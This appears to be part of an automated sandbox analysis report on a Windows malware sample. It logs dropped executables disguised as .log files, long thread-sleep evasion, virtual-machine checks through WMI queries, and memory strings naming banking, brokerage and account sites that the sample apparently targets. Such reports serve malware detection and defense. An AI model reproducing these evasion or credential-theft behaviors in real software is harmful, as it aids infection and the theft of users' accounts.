                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\JVSqkWFI.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\ScGOdifB.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\jrGLbElV.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\BQsBwRkl.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\vWmBrFMh.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\ftgCpYKW.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\pkjlEjqK.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\XPYNFevp.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\FcMrvptI.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZInvrbgn.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\OoZhLKXw.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\pSWUxCdp.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\TQKWOvbz.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\GrAQXWWY.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 2284Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 3024 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9092Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 1235 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9140Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8880Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep count: 1180 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8832Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep count: 1788 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 612Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8912Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep count: 1427 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9176Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8920Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 1264 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8896Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep count: 1139 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8936Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep count: 1199 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9180Thread sleep time: -9223372036854770s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8204Thread sleep count: 1151 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364Thread sleep count: 1401 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9160Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8928Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8536Thread sleep count: 1304 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9172Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8888Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464Thread sleep count: 1344 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9188Thread sleep time: -13835058055282155s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8460Thread sleep count: 1360 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9168Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8684Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8560Thread sleep count: 1173 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8800Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8552Thread sleep count: 2252 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9100Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8904Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360Thread sleep count: 1607 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9116Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8848Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512Thread sleep count: 1365 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9144Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400Thread sleep count: 1378 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9020Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8696Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 9148Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 7748Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 5656Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -33204139332677172s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -600000s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -599843s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -599625s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -598718s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -598524s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -598234s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -598077s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 8412Thread sleep time: -18000000s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597718s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597541s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597404s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597275s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597153s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -597046s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -596933s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -596813s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -596557s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -596015s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -595825s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -595640s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -595468s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -595265s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -595120s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -594988s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -594859s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -594723s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -594598s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6148Thread sleep time: -594468s >= -30000s
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 8668Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 8704Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 4816Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 6784Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe TID: 8952Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe TID: 4404Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 30000
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 600000
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 599843
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 599625
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 598718
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 598524
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 598234
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 598077
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 3600000
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597718
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597541
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597404
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597275
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597153
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597046
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 596933
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 596813
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 596557
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 596015
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595825
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595640
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595468
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595265
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595120
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594988
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594859
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594723
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594598
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594468
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: qfrwB6ToHg.71.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: qfrwB6ToHg.71.drBinary or memory string: discord.comVMware20,11696428655f
                            Source: qfrwB6ToHg.71.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: qfrwB6ToHg.71.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: 9XHFe6y4Dj.exe, tqeRXJHxPWPPoiNqjJeEYdv.exe.0.dr, tqeRXJHxPWPPoiNqjJeEYdv.exe0.0.dr, tqeRXJHxPWPPoiNqjJeEYdv.exe2.0.drBinary or memory string: D7HGfSY2GpSdG7fwcUn2
                            Source: qfrwB6ToHg.71.drBinary or memory string: global block list test formVMware20,11696428655
                            Source: qfrwB6ToHg.71.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: qfrwB6ToHg.71.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: qfrwB6ToHg.71.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: qfrwB6ToHg.71.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
